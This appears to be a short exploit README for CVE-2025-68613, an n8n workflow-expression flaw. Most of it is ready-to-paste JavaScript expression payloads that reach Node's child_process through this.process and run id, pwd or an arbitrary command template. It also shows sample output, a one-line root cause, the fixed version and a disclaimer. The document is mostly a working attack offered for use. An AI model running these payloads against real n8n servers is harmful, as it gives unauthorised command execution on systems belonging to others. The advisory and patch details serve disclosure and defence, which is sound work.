
CVE-2025-68613: n8n RCE vulnerability exploit and documentation
n8n contains a critical Arbitrary Code Execution vulnerability in its workflow expression evaluation system. Under certain conditions, expressions supplied by authenticated users during workflow configuration may be evaluated in an execution context that is not sufficiently isolated from the underlying runtime.
Paste this payload into the expression field:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

ID Command:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}
PWD Command:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('pwd').toString() })() }}
Custom Command Template:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('COMMAND').toString() })() }}
For id command:
uid=1000(node) gid=1000(node) groups=1000(node)
For pwd command:
/app
The expression evaluator lacks a sanitizer to prevent function expressions from accessing this.process (Node.js process object), allowing access to system modules.
Upgrade to n8n v1.122.0 or later.
Disclaimer: This information is provided for sandbox and educational purposes only. Unauthorized use of this information to exploit systems is illegal and unethical. Always obtain proper authorization before testing or exploiting vulnerabilities.